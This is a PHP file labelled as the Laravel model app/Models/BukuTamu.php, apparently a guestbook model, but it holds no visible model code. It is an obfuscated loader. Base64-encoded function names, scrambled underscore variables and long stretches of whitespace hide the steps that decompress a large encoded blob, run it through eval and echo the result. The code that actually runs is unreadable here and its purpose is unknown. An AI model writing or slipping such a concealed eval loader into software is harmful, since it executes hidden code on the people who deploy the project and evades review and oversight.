<?php 
        $__='printf';$_='Loading app/Models/BukuTamu.php';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;
